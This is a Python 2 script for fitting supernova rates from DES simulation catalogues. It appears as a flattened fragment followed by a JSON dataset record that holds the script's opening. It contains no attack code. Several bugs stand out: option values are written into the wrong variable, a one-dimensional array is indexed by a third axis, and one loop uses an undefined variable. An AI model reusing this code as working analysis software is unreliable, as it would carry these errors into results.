open(cutdnamestr, 'rb') as f_in: # with gzip.open(cutdnamestr + '.gz', 'wb') as f_out: # shutil.copyfileobj(f_in, f_out) cutsnamestr = simname.split('.')[0] + '+CUTS.FITRES.gz' np.savetxt(cutsnamestr, RateTest.realcat.Catalog[(RateTest.realcat.Catalog[RateTest.ztype] < zmaxFit) & (RateTest.realcat.Catalog[RateTest.ztype] > zminFit)], delimiter = ' ', fmt = '%s') lowzCut = zminFit highzCut = zmaxFit SampleSizes.append( RateTest.realcat.Catalog[(RateTest.realcat.Catalog[RateTest.ztype] < zmaxFit) & (RateTest.realcat.Catalog[RateTest.ztype] > zminFit)].shape[0]) #with open(cutsnamestr, 'rb') as f_in: # with gzip.open(cutsnamestr + '.gz', 'wb') as f_out: # shutil.copyfileobj(f_in, f_out) ks.append(RateTest.k) kErrs.append(RateTest.kErr) if Rate_Model != 'discrete': if Blind: print "Blinding f" Betas.append(RateTest.Beta+ np.cos(cosVal)) else: Betas.append(RateTest.Beta) BetaErrs.append(RateTest.BetaErr) if Rate_Model == 'brokenpowerlawVar': zBreaks.append(Rate_Fitter.zBreak) zBreakErrs.append(Rate_Fitter.zBreakErr) Chi2s.append(RateTest.chi2) print "CCScale Storage Iter {0}".format(simInd) print CCScaleStorage if not noCCMC: print CCScale print CCScale[0] if Rate_Model != 'discrete': if np.isnan(RateTest.Beta): nFail +=1 except Exception, e: print "FAILURE" print e traceback.print_exc() nFail +=1 #if Blind: # Betas = np.array(Betas) + np.cos(47392945716038.134971247) print "Number of Failures" print nFail if Rate_Model != 'discrete': badSims = np.invert(np.isfinite(Betas) & (BetaErrs > 0) & np.isfinite(ks) & (kErrs > 0)) mBetas = ma.masked_array(Betas, mask=badSims) mBetaErrs = ma.masked_array(BetaErrs, mask=badSims) mks = ma.masked_array(ks, mask=badSims) mkErrs = ma.masked_array(kErrs, mask=badSims) print "mean k" print np.nanmean(ks) print "mean kerrs" print np.nanmean(kErrs) print "std. k" print np.nanstd(ks) print "Mean beta" print np.nanmean(Betas) print "Mean betaerrs" print np.nanmean(BetaErrs) print "std. beta" print np.nanstd(Betas) if len(Betas) == 1: kmean.append(ks[0]) ksigma.append(0.0) kErr.append(kErrs[0]) BetaMean.append(Betas[0]) BetaSigma.append(0.0) BetaErr.append(BetaErrs[0]) else: print "test here" print ks print mks print Betas print mBetas print 'end test here' kmean.append(np.average(mks, weights = 1.0/mkErrs**2)) ksigma.append(np.std(mks)) kErr.append(np.mean(mkErrs)) BetaMean.append(np.average(mBetas, weights = 1.0/mBetaErrs**2)) #BetaWeightMean.append(np.average(Betas, weights = 1.0/ma.masked_invalid(BetaErrs)**2)) #KWeightMean.append(np.average(ks, weights = 1.0/ma.masked_invalid(kErrs)**2)) BetaSigma.append(np.std(mBetas)) BetaErr.append(np.mean(mBetaErrs)) else: print "mean f_Js" print np.nanmean(f_JStorage, axis =0) print "mean f_JErrs" print np.nanmean(f_JErrStorage, axis =0) if Rate_Model == 'brokenpowerlawVar': zBreakMeans.append(np.nanmean(zBreaks)) zBreakSigmas.append(np.nanstd(zBreaks)) Chi2Mean.append(np.nanmean(Chi2s)) Chi2Sigma.append(np.nanstd(Chi2s)) #if simInd == 1: print "Indiv Chi2s" print Chi2s bins0 = np.linspace(1.0, 20.0, 10) hist, bins = np.histogram(Chi2s, bins = bins0) xs = (bins[1:] + bins[:-1])/2.0 plt.bar(xs, hist, width = bins[1:] - bins[:-1]) print "Chi2 Hist" print bins print hist chi2s = scipy.stats.chi2.pdf(xs, nbinsFit - 2) norm = np.max(hist)*1.0/np.max(chi2s) plt.plot(xs, chi2s*norm, color = 'g') if cheatType and not cheatZ: plt.savefig(dataname +'Chi2Plot_CheatType.png') elif cheatZ and not cheatType: plt.savefig(dataname +'Chi2Plot_CheatZ.png') elif cheatZ and cheatType: plt.savefig(dataname +'Chi2Plot_CheatTypeZ.png') else: plt.savefig(dataname +'Chi2Plot.png') if not noCCMC: print "AAA CC Scale means (weighted, unweighted)" #print np.average(ma.masked_invalid(np.array(CCScaleStorage)),weights = 1.0/ma.masked_invalid(CCScaleErrStorage)**2, axis = 0) #print np.nanmean(ma.masked_invalid(np.array(CCScaleStorage)), axis = 0) #print CCScaleStorage #print CCScaleErrStorage print np.average(np.array(CCScaleStorage),weights = 1.0/ma.masked_invalid(CCScaleErrStorage)**2, axis = 0) print np.nanmean(np.array(CCScaleStorage), axis = 0) print "AAA CC Scale stds" print np.nanstd(np.array(CCScaleStorage), axis = 0) CCScaleStorageGlobal.append(CCScaleStorage) print "All Betas" print Betas if cheatType: print "THESE RESULTS ONLY INCLUDE TRUE Ias BECAUSE WE CHEATED AND USED THE SIM INFORMATION" if cheatZ: print "THESE RESULTS Use Simulated Redshift info" ''' print "lengths of lists" print len(RateTest.globalNDataStorage) print len(RateTest.globalChi2Storage) print len(RateTest.globalZPhotBinStorage) print len(RateTest.globalNDataIaPhotBinStorage) plt.clf() plt.scatter(RateTest.globalNDataStorage, RateTest.globalChi2Storage) plt.xlabel('nData') plt.ylabel('chi2 in bin') string = '' if cheatType: string += 'CheatType' if cheatZ: string += 'CheatZ' print 'string here' print string plt.savefig(RateTest.realName + 'Chi2VsnData' + string +'.png') plt.clf() plt.scatter(RateTest.globalZPhotBinStorage, RateTest.globalChi2Storage) plt.xlabel('zPhot bin center') plt.ylabel('chi2 in bin') plt.savefig(RateTest.realName + 'Chi2VsZPhot' + string +'.png') plt.clf() plt.clf() plt.scatter(RateTest.globalZPhotBinStorage, RateTest.globalNDataIaPhotBinStorage, s = 1, c = 'r', label = 'Type Ia Data, zPhot') plt.scatter(RateTest.globalZPhotBinStorage, RateTest.globalNDataCCPhotBinStorage, s = 1, c = 'b', label = 'CC Data, zPhot') plt.scatter(RateTest.globalZTrueBinStorage, RateTest.globalNDataIaTrueBinStorage, s = 1, c = 'Pink', label = 'Type Ia Data, zTrue') plt.scatter(RateTest.globalZTrueBinStorage, RateTest.globalNDataCCTrueBinStorage, s = 1, c = 'Cyan', label = 'CC Data, zTrue') plt.yscale('log') plt.xlabel('redshift either true or phot') plt.legend() plt.savefig(RateTest.realName + 'AggregateZDistro' + string +'.png') ''' #print "MURES CUTS" #print MURES_Cuts print "Frac Contam Cuts" print fracContamCuts if Rate_Model != 'discrete': print "Kmeans" print kmean print "Ksigmas" print ksigma print "BetaMeans" print BetaMean print "BetaSigmas" print BetaSigma print "BetaErrs" print BetaErr else: print "f_J mean unweighted" print np.mean(f_JStorage, axis = 0) print "f_J mean weighted" print np.average(f_JStorage, weights = 1.0/(np.array(f_JErrStorage))**2, axis = 0) print "f_J Errors" print np.mean(f_JErrStorage, axis = 0) if Rate_Model == 'brokenpowerlawVar': print "mean powerlaw break z" print zBreakMeans print "st. dev powerlaw break z" print zBreakSigmas print "Chi2Means" print Chi2Mean print "Chi2Sigma" print Chi2Sigma assert(fracContamCuts[0] == -1) outfile = dataname if Rate_Model != 'discrete': print "outfile Pre Prefix" print outfile if cheatType: outfile = outfile + '_CheatType' if cheatZ: outfile = outfile + 'Z' elif cheatZ: outfile = outfile + '_CheatZ' outfile1 = outfile + '.txt' outfile2 = outfile + '-IndivBetaK.txt' output2 = open(outfile2, 'w') output2.write('i Beta_i k_i BetaErr_i kErr_i\n') for i, b, k, berr, kerr in zip(range(len(Betas)),Betas, ks, BetaErrs, kErrs): output2.write('{0} {1:.4f} {2:.4f} {3:.4f} {4:.4f}\n'.format(i, b, k, berr, kerr)) output2.close() print "Outfile Name" if not(os.path.isfile(outfile1)): output = open(outfile1, 'w') output.write('#Date Date/time at which job finished\n') output.write('#DataBeta Input beta for the simulated data sample. Will be 0.0 for real data.\n') output.write('#N_sims Number of datalike sims that go into the subsequent means\n') output.write('#SampleSize Mean Number of Events in data post cut\n') output.write('#delta_Beta mean difference between large MC sim beta (2.11 for the time being) and the measured beta for the data (not the beta in column 2.\n') output.write('#sigma_Beta stdev of delta_Beta over N_sims sims\n') output.write('#BetaStdErr std. error in the mean of delta_Beta over N_sims sims\n') output.write('#Beta_err mean statistical error on beta\n') output.write('#K mean ratio between large MC sim K (1.7E-5 for the time being) and the measured K for the data \n') output.write('#sigma_K stdev of K over N_sims sims\n') output.write('#KStdErr std. error in the mean of K over N_sims sims\n') output.write('#KStaterr mean statistical error on K\n') output.write('#meanZ mean photoZ of the large MC sim\n') output.write('#sigmaZ std. deviation of the photoZs for the large Sim\n') output.write('#sigmaDZ std. deviation of (zSim - zPHOT)\n') output.write('#NCC/NTotScaled overall CC Contamination after adjusting CC Frac to data\n') output.write('#NCC/NTot overall CC Contamination in sim only\n') output.write('#CCScales relative sim vs. CC rate in z-bins \n') output.write('#TypeChoice Internal Diagnostic, check code comments\n') output.write('#NNProbCut Threshold for NN probability of Ia\n') output.write('#NBins Number of Analysis Bins\n') output.write('#MRSLow Threshold for Neg Mures Outliers\n') output.write('#MRSHigh Threshold for Pos Mures Outliers\n') output.write('#FitprobCut Lowest Fitprob in sim\n') output.write('#MRSCut NSigma Hubble residual cut\n') output.write('#Chi2 minimum value of Chi2 function\n') output.write('#Correlation cov[0,1]/np.sqrt(cov[0,0]*cov[1,1])\n') output.write('#Date \t\tDataBeta N_sims SampleSize delta_Beta sigma_Beta BetaStdErr BetaStatErr K sigma_K KStdErr KStatErr meanZ sigmaZ sigmaDz NCC/NTotScaled NCC/NTot CCScales TypeChoice NNProbCut NBins MRSLow MRSHigh FitprobCut MRSCut Chi2 Correlation\n') else: output = open(outfile1, 'a') print 'outfile' print outfile cat = RateTest.simcat.Catalog t = time.strftime('%b-%d-%H:%M') N_Sims = np.sum(np.invert(np.isnan(ks))) SigBeta = float(BetaSigma[0]) SigK = float(ksigma[0]) kStdErr = float(ksigma[0])/np.sqrt(N_Sims) BetaStdErr = float(BetaSigma[0])/np.sqrt(N_Sims) meanZ = np.nanmean(cat[RateTest.ztype]) sigZ = np.nanstd(cat[RateTest.ztype]) sigDZ = np.nanstd(cat[RateTest.ztype] - cat['SIM_ZCMB']) lowzCut = zminFit highzCut = zmaxFit contam2 = np.sum(cat[(cat[RateTest.ztype] > lowzCut) & (cat[RateTest.ztype] < highzCut)]['SIM_TYPE_INDEX'] !=1).astype(float)/ float(cat[(cat[RateTest.ztype] > lowzCut) & (cat[RateTest.ztype] < highzCut)].shape[0]) contam = RateTest.fracCCDataTot ccscales = np.average(np.array(CCScaleStorage),weights = 1.0/ma.masked_invalid(CCScaleErrStorage)**2, axis = 0) cov = RateTest.covar correlation = cov[0, 1] / np.sqrt(cov[0, 0] * cov[1, 1]) print "Outfile debug" print t print trueBeta print N_Sims print BetaMean[0] print BetaStdErr print BetaErrs[0] print meanZ print sigZ print sigDZ print contam print RateTest.typeString print RateTest.postCutSimCat['NN_PROB_IA'].min() print SigBeta print kmean[0] print kErrs[0] print kStdErr print SigK print np.nanmean(SampleSizes) print int(nbinsFit) print ScaleMuResCutLow print ScaleMuResCutHigh print RateTest.postCutSimCat['FITPROB'].min() print MURESCuts print np.mean(Chi2Mean) print contam2 print ccscales print correlation ccscales = ','.join(str(ccscales).split()) output.write('{0}\t\t{1:.2f}\t{2}\t{17:.3f}\t{3:.3f}\t{12:.3f}\t{4:.3f}\t{5:.3f}\t{13:.3f}\t{14:.3f}\t{15:.3f}\t{16:.3f}\t{6:.3f}\t{7:.3f}\t{8:.3f}\t{9:.3f}\t{24:.3f}\t{25}\t{10}\t{11:.3f}\t{18:d}\t{19:.3f}\t{20:.3f}\t{21:.3f}\t{22:.2f}\t{23:.3f}\t{26:.3f}\n'.format(t, trueBeta, N_Sims, BetaMean[0], BetaStdErr, BetaErrs[0],meanZ, sigZ, sigDZ, contam, RateTest.typeString, RateTest.postCutSimCat['NN_PROB_IA'].min(), SigBeta, kmean[0], kErrs[0], kStdErr, SigK, np.nanmean(SampleSizes), int(nbinsFit), ScaleMuResCutLow, ScaleMuResCutHigh, RateTest.postCutSimCat['FITPROB'].min(), MURESCuts, np.mean(Chi2Mean), contam2, ccscales, correlation) ) print "BetaMean[0]" print BetaMean[0] print BetaMean print "KMean[0]" print kmean[0] print kmean print "Correlation" print correlation #print "BetaWeightMean[0]" #print BetaWeightMean[0] #print BetaWeightMean #print "KWeightMean[0]" #print KWeightMean[0] #print KWeightMean if not noCCMC: print "Individual Scales" print CCScaleStorage print "Individual ScaleErrs" print CCScaleErrStorage print "average ScaleErrs" print np.nanmean(CCScaleErrStorage) print "AAA CC Scale means (weighted, unweighted)2" print np.average(ma.masked_invalid(np.array(CCScaleStorage)), weights = 1.0/ma.masked_invalid(CCScaleErrStorage)**2) print np.nanmean(ma.masked_invalid(np.array(CCScaleStorage))) print "AAA CC Scale stds" print np.nanstd(np.array(CCScaleStorage)) if simInd == 1: plt.clf() hist, bins = np.histogram(CCScaleStorage, bins = np.linspace(0.0, 5.0, 10)) plt.step((bins[1:]+bins[:-1])/2.0, hist, where = 'mid', c = 'g') plt.savefig(dataname + 'ScaleDistro.png') plt.clf() print "nIter" print nIter if not (priorRate is None): kPriorPlots = np.linspace(0.8, 1.5, 300) kPriors = [] for ktemp in kPriorPlots: kPriors.append(ratePrior(ktemp*trueMCK, BetaMean[0]*trueMCBeta, priorRate, priorZEff, priorRateErrUp = ratePriorErrUp, priorRateErrDown = ratePriorErrDown, priorRateErrAll = ratePriorErrAll)) betaPriorPlots = np.linspace(-0.5, 0.5, 300) betaPriors = [] for btemp in betaPriorPlots: betaPriors.append(ratePrior(kmean[0]*trueMCK, b*trueMCBeta, priorRate, priorZEff, priorRateErrUp = ratePriorErrUp, priorRateErrDown = ratePriorErrDown, priorRateErrAll = ratePriorErrAll)) actualPrior = ratePrior(kmean[0]*trueMCK, BetaMean[0]*trueMCBeta, priorRate, priorZEff, priorRateErrUp = ratePriorErrUp, priorRateErrDown = ratePriorErrDown, priorRateErrAll = ratePriorErrAll) kPriors = np.array(kPriors) betaPriors = np.array(betaPriors) plt.clf() plt.figure() plt.plot(kPriorPlots, np.log10(kPriors) ) plt.hlines(np.log10(actualPrior), kPriorPlots[0], kPriorPlots[-1], label = 'Best Fit Prior = {0:.03f}'.format(actualPrior)) plt.vlines(kmean[0], np.log10(kPriors).min(), np.log10(kPriors).max(), label = 'Best Fit K = {0:.03f}'.format(kmean[0])) plt.xlabel('k') plt.ylabel('ratePrior') plt.legend() plt.savefig(dataname + '_LogKPriorPlot.png') plt.clf() plt.figure() plt.plot(kPriorPlots, kPriors) plt.hlines(actualPrior, kPriorPlots[0], kPriorPlots[-1], label = 'Best Fit Prior = {0:.03f}'.format(actualPrior)) plt.vlines(kmean[0], kPriors.min(), kPriors.max(), label = 'Best Fit K = {0:.03f}'.format(kmean[0])) plt.xlabel('k') plt.ylabel('ratePrior') plt.legend() plt.savefig(dataname + '_KPriorPlot.png') plt.clf() plt.figure() plt.plot(betaPriorPlots, betaPriors) plt.hlines(actualPrior, betaPriorPlots[0], betaPriorPlots[-1], label = 'Best Fit Prior = {0:.03f}'.format(actualPrior)) plt.vlines(BetaMean[0], betaPriors.min(), betaPriors.max(), label = 'Best Fit Beta = {0:.03f}'.format(BetaMean[0])) plt.xlabel('beta') plt.ylabel('ratePrior') plt.legend() plt.savefig(dataname + '_BetaPriorPlot.png') ''' argList = '' minObjList = '' chi2Initargs = '' for i in xrange(zCenters.shape[0]): argList += 'f{0},'.format(i) minObjList += 'f{0} = 1.0, error_f{0} = 0.1, limit_f{0} = (0.0, None),'.format(i) chi2Initargs += '1.0,' argList = argList[:-1] minObjList = minObjList[:-1] chi2Initargs = chi2Initargs[:-1] #print argList #print minObjList #print chi2Initargs exec(''' ''' def chi2func(nData, nSim, effmat, fnorm, zCenters, {0}, dump = False, complexdump = False): Chi2Temp = 0.0 f_Js = [{0}] chi2Mat = np.zeros((self.nbins)) adjNMC = np.zeros((self.nbins)) #print f_Js #Check if I am scaling errors down with increasing MC size. Make MC twice as large as "Data" to test. for row, nDataI, i in zip(effmat, nData, xrange(self.nbins)): #if dump: # print "nDataI" # print nDataI JSumTemp = 0.0 for eff, nSimJ, f_J, j in zip(row, nSim, f_Js, xrange(self.nbins)): JSumTemp += nSimJ*f_J*eff*fnorm if dump and i == j: print "nDataI" print nDataI print "Bin Contribution to scaled nSim" print nSimJ*f_J*eff*fnorm #print "Product of nSimJ, f_J, eff, fnorm" #print nSimJ #print f_J #print eff #print fnorm if nDataI > 1E-11 or JSumTemp > 1E-11: if dump and i == j: print "nDataI" print nDataI print "scaled nSim" print JSumTemp print "fnorm" print fnorm print "error" print nDataI + JSumTemp*fnorm if (nDataI + JSumTemp*fnorm) <= 0: print (nDataI + JSumTemp*fnorm) assert(0) Chi2Temp += ((nDataI - JSumTemp)**2/(nDataI + JSumTemp*fnorm))#*fnorm**2 return Chi2Temp ''''''.format(argList), locals()) fnorm = float(np.sum(nData))/float(self.simcat.Catalog['zPHOT'].shape[0]) #print type(chi2func) #print 'lamChi2 = lambda {0}: chi2func(nData, nSim, self.effmat, fnorm, zCenters, {0})'.format(argList) exec('lamChi2 = lambda {0}: chi2func(nData, nSim, self.effmat, fnorm, zCenters, {0})'.format(argList),locals()) exec('lamChi2Dump = lambda {0}: chi2func(nData, nSim, self.effmat, fnorm, zCenters, {0}, dump = True)'.format(argList),locals()) #print type(lamChi2) #print type(lamChi2Dump) #print 'MinObj = M(lamChi2, {0})'.format(minObjList) exec('MinObj = M(lamChi2, {0})'.format(minObjList),locals()) exec('chi2Init = lamChi2Dump({0})'.format(chi2Initargs),locals()) #print "Chi2 init = {0}".format(round(chi2Init, 4)) MinObj.set_strategy(2) MinObj.migrad() #MinObj.minos() zCenters = (simBins[1:] + simBins[:-1])/2.0 print MinObj.values fJs = [] fJErrs = [] for v in MinObj.values.keys(): fJs.append(MinObj.values[v]) fJErrs.append(MinObj.errors[v]) exec('lamChi22 = lambda k, Beta: self.chi2V2(fJs, fJErrs, zCenters, k, Beta)',locals()) exec('MinObj2 = M(lamChi22, k = 1.0, error_k = 0.1, limit_k = (0.0, None), Beta = 0.0, error_Beta = 0.1)',locals()) #print "Large Perfect Sim {0}".format(simInd) #print "Sim R0 = 1.7E-5; Sim Beta = 4.2" ##print "Sim Beta = 1.5; Data Beta = 1.5" ##RateTest = Rate_Fitter('DES_FULLSURVEY_TEST/JLDESFULLSURVEYIaOnly+zPHOT+smearC11/FITOPT000+SALT2mu.FITRES', 'JLDESFULLSURVEYIaOnly+zPHOT+smearC11','JLDES_R0_7E-5_Beta_1-5_Shallow/JLDES_R0_7E-5_Beta_1-5_Shallow/FITOPT000+SALT2mu.FITRES', 'JLDES_R0_7E-5_Beta_1-5_Shallow','/project/rkessler/SN/SNDATA_ROOT/SIM/JLDES_R0_7E-5_Beta_1-5_Shallow/JLDES_R0_7E-5_Beta_1-5_Shallow.DUMP') #print '/project/rkessler/jlasker/Rate_Analysis/TestSameK2Beta/outFit_datasize/JLDES_R0_1-7E-5_Beta_4-2_Datasize_Perfect-00{0:02d}/FITOPT000.FITRES'.format(simInd) #RateTest = Rate_Fitter('/project/rkessler/jlasker/Rate_Analysis/TestSameK2Beta/outFit_datasize/JLDES_R0_1-7E-5_Beta_4-2_Datasize_Perfect-00{0:02d}/FITOPT000.FITRES'.format(simInd), 'TestSameK2Beta/JLDES_R0_1-7E-5_Beta_4-2-00{0:02d}'.format(simInd),'/project/rkessler/jlasker/Rate_Analysis/outFit_datalike/JLDES_R0_1-7E-5_Beta_2-1_Datalike_PERFECT/FITOPT000.FITRES', 'JLDES_R0_1-7E-5_Beta_2-1_DataLikePhotZ','/scratch/midway2/rkessler/SNDATA_ROOT/SIM/JLDES_R0_1-7E-5_Beta_2-1_Datalike_PERFECT/JLDES_R0_1-7E-5_Beta_2-1_Datalike_PERFECT.DUMP', 2.1, zmin = 0.1, zmax = 1.3)# , MJDMin = 0, MJDMax = np.inf) #RateTest.effCalc(nbins = 12) ##RateTest.effCalc(nbins = 20) #RateTest.fit_rate() #ksPerf.append(RateTest.k) #kErrsPerf.append(RateTest.kErr) #BetasPerf.append(RateTest.Beta) #BetaErrsPerf.append(RateTest.BetaErr) #print "Sim Beta = 1.5; Data Beta = 1.5" #RateTest = Rate_Fitter('DES_FULLSURVEY_TEST/JLDESFULLSURVEYIaOnly+zPHOT+smearC11/FITOPT000+SALT2mu.FITRES', 'JLDESFULLSURVEYIaOnly+zPHOT+smearC11','JLDES_R0_7E-5_Beta_1-5_Shallow/JLDES_R0_7E-5_Beta_1-5_Shallow/FITOPT000+SALT2mu.FITRES', 'JLDES_R0_7E-5_Beta_1-5_Shallow','/project/rkessler/SN/SNDATA_ROOT/SIM/JLDES_R0_7E-5_Beta_1-5_Shallow/JLDES_R0_7E-5_Beta_1-5_Shallow.DUMP') try: optfname = argv[1] opts = open(optfname, 'r') optlist = opts.readlines() zmin = None; zmax = None; MJDMin = None; MJDMax = None; bins = None; runFit = None for opt in optlist: try: optName, optVal = opt.split() except: print "{0} not formatted correctly".format(opt) continue if (optName.lower() == 'zmin') & (not zmin): zmin = optVal if (optName.lower() == 'zmax') & (not zmax): zmax = optVal if (optName.lower() == 'mjdmin') & (not MJDMin): MJDMin = optVal if (optName.lower() == 'mjdmax') & (not MJDMax): MJDMax = optVal if (optName.lower() == 'bins') & (not bins): zmin = optVal if (optName.lower() == 'runfit') & (not runFit == None): zmin = optVal if zmin == None: zmin = 0.1 if zmax == None: zmax = 1.2 if MJDMin == None: MJDMin = 0.0 if MJDMax == None: MJDMax = np.inf if bins == None: bins = "equalSize" if runFit == None: runFit = True except: print "Option File not working/Nonexistent. Using default values" '''
normal
{ "blob_id": "27976e9f7fbe030910b3595ea1a13e0e505183e5", "index": 7131, "step-1": "#!/software/python-2.7-2014q3-el6-x86_64/bin/python\nimport SNANA_Reader as simread\nimport REAL_Reader as dataread\n#import astropy.cosmology as cosmo\nimport traceback\nimport scipy\nimport scipy.stats as stats\nimport numpy as np\nimport matplotlib.pyplot as plt\nplt.switch_backend('Agg')\n#import Cosmology\nimport scipy.stats.mstats as mstats\nimport scipy.stats as stats\nfrom scipy.interpolate import UnivariateSpline\nfrom sys import argv\nimport glob\nimport time\nimport os\nimport gzip\nimport shutil\nimport numpy.ma as ma\nimport subprocess\nimport iminuit as iM\nfrom iminuit import Minuit as M\nfrom discreteChi2Func import discreteChi2Func as chi2func\nimport pandas as pd\n\n\nclass Rate_Fitter:\n def __init__(self, realfilename, realName, simfilename, simName, simgenfilename, MCBeta, MCK, zminSamp=0.1, zmaxSamp=1.20 , zminFit = 0.1, zmaxFit = 1.20, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95, Rate_Model = 'powerlaw', cheatType = False, cheatZ = False, cheatCCSub = False, cheatCCScale = False, cuts = None, nprint = 5, MURESCuts = None, noCCMC = False, priorRate = None, priorZEff = None, ratePriorErrUp = None, ratePriorErrDown =None, ratePriorErrAll = None, fixCCScale = False):\n print \"Rate_Fitter\"\n print \"np version {0}\".format(np.__version__)\n \n self.zminSamp = zminSamp\n self.zmaxSamp = zmaxSamp\n self.zminFit = zminFit\n self.zmaxFit = zmaxFit\n self.MCBeta = MCBeta\n self.MCK = MCK\n self.Rate_Model = Rate_Model\n self.cheatType = cheatType\n self.cheatZ = cheatZ\n self.cheatCCSub = cheatCCSub\n self.cheatCCScale = cheatCCScale\n self.cuts = cuts\n self.nprint = nprint\n self.MURESCuts = MURESCuts\n self.priorRate = priorRate\n self.priorZEff = priorZEff\n self.ratePriorErrUp = ratePriorErrUp\n self.ratePriorErrDown = ratePriorErrDown\n self.ratePriorErrAll = ratePriorErrAll\n self.fixCCScale = fixCCScale\n\n #print \"PRIORS\"\n #print priorRate\n #print priorZEff\n #print ratePriorErrUp\n #print ratePriorErrDown\n\n if self.cheatZ:\n self.ztype = 'SIM_ZCMB'\n else:\n #self.ztype = 'zHD'\n self.ztype = 'zPHOT'\n\n self.shiftFlagData = False\n self.shiftFlagSim = False\n\n\n self.globalChi2Storage = []\n self.globalNDataStorage = []\n '''\n \n self.globalZPhotBinStorage = []\n self.globalNDataIaPhotBinStorage = []\n self.globalNDataCCPhotBinStorage = []\n self.globalZTrueBinStorage = []\n self.globalNDataIaTrueBinStorage = []\n self.globalNDataCCTrueBinStorage = []\n '''\n print 'a'\n try: \n self.simcat = simread.SNANA_Cat(simfilename, simName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95)\n except:\n try:\n self.simcat = simread.SNANA_Cat(simfilename, simName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95, skip_header = 5)\n\n except: \n self.simcat = simread.SNANA_Cat(simfilename, simName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95, skip_header = 6)\n print 'b' \n self.simName = simName\n self.simgencat = simread.SNANA_Cat(simfilename, simName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95)\n print 'c' \n try:\n #with np.load(simgenfilename+'.npz', allow_pickle = True) as data0:\n # SIMGEN = data0['a']\n \n SIMGEN = np.load(simgenfilename + '.npy', allow_pickle = True)\n except:\n \n SIMGEN = np.genfromtxt(simgenfilename, dtype=None, names = True, skip_footer=3, invalid_raise=False)\n print \"Compress save A\"\n SIMGEN.dtype.names = map(str, SIMGEN.dtype.names)\n #np.savez_compressed(simgenfilename+'.npz', a = SIMGEN)\n np.save(simgenfilename+'.npy', SIMGEN)\n \n print \"WHY DO YOU HATE ME WHEN I SHOW YOU NOTHING BUT LOVE\"\n print simgenfilename\n #SIMGEN = pd.read_csv(simgenfilename, delim_whitespace=True, comment=\"#\").to_records(index = False)\n print 'd'\n SIMGEN = SIMGEN[SIMGEN['GENZ'] != 'GENZ']\n\n self.simgencat.params = {'flat':True, 'H0': simH0, 'Om0':simOmegaM, 'Ob0': simOb0, 'sigma8': simSigma8, 'ns': simNs}\n #self.simgencat.cosmo = Cosmology.setCosmology('simCosmo', self.simcat.params)\n self.simgencat.OrigCatalog = np.copy(SIMGEN)\n self.simgencat.Catalog = np.copy(SIMGEN)\n self.simgencat.Catalog = self.simgencat.Catalog[self.simgencat.Catalog['GENZ'] != 'GENZ']\n self.simgencat.simname = simName\n self.simgencat.NSN = self.simgencat.Catalog['GENZ'].shape[2]\n\n print \"SIMGEN NUMBER\"\n print self.simgencat.NSN\n print \"TEST2\"\n print self.simgencat.Catalog['GENZ'].shape[0]\n print self.simgencat.Catalog['GENZ'].shape[1]\n print self.simgencat.Catalog['GENZ'].shape[2]\n print \"SIMGENCAT FILE\"\n print simfilename\n\n self.realName = realName\n try:\n print 'q'\n self.realcat = simread.SNANA_Cat(realfilename, realName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95, skip_header = 6)\n except:\n #self.realcat = simread.SNANA_Cat(realfilename, realName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95)\n try:\n print 'r'\n self.realcat = simread.SNANA_Cat(realfilename, realName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95)\n except:\n print 's'\n self.realcat = dataread.REAL_Cat(realfilename, realName, skip_header =11 )\n\n if self.cheatType:\n print \"WARNING, THE FITTER IS CHEATING AND ELIMINATED NON-IAs USING SIM INFO\"\n self.realcat.Catalog = self.realcat.Catalog[self.realcat.Catalog['SIM_TYPE_INDEX'].astype(int) == 1]\n self.simcat.Catalog = self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'].astype(int) == 1]\n\n print \"Pre cut Catalog\"\n print self.realcat.Catalog.shape\n for cut in cuts:\n print 'a'\n print cut\n print self.realcat.Catalog.shape\n self.realcat.Catalog = self.realcat.Catalog[(self.realcat.Catalog[cut[0]].astype(type(cut[1])) > cut[1]) & (self.realcat.Catalog[cut[0]].astype(type(cut[2])) < cut[2])]\n self.simcat.Catalog = self.simcat.Catalog[(self.simcat.Catalog[cut[0]].astype(type(cut[1])) > cut[1]) & (self.simcat.Catalog[cut[0]].astype(type(cut[2])) < cut[2])]\n print 'b'\n print cut\n print self.realcat.Catalog.shape\n\n self.postCutRealCat = np.copy(self.realcat.Catalog)\n self.postCutSimCat = np.copy(self.simcat.Catalog)\n\n self.realcat.Catalog = self.realcat.Catalog[(self.realcat.Catalog[self.ztype].astype(float) > self.zminSamp) & (self.realcat.Catalog[self.ztype].astype(float) < self.zmaxSamp)]\n self.simcat.Catalog = self.simcat.Catalog[(self.simcat.Catalog[self.ztype].astype(float) > self.zminSamp) & (self.simcat.Catalog[self.ztype].astype(float) < self.zmaxSamp)]\n print 'zCut Pre MURESCut'\n print np.sum((self.realcat.Catalog[self.ztype].astype(float) > self.zminFit) & (self.realcat.Catalog[self.ztype].astype(float) < self.zmaxFit))\n print 'MURESCUT'\n print self.MURESCuts\n print self.realcat.Catalog.shape\n\n if not (self.MURESCuts is None):\n '''\n #MURES Cut format: (zmin, zmax, neg Cut, pos Cut)\n\n for mc in self.MURESCuts:\n\n realCond = (self.realcat.Catalog[self.ztype] < mc[0]) | (self.realcat.Catalog[self.ztype] > mc[1])| ((self.realcat.Catalog['MURES'] > mc[2])& (self.realcat.Catalog['MURES'] < mc[3]))\n\n simCond = (self.simcat.Catalog[self.ztype] < mc[0]) | (self.simcat.Catalog[self.ztype] > mc[1])| ((self.simcat.Catalog['MURES'] > mc[2])& (self.simcat.Catalog['MURES'] < mc[3]))\n\n self.realcat.Catalog = 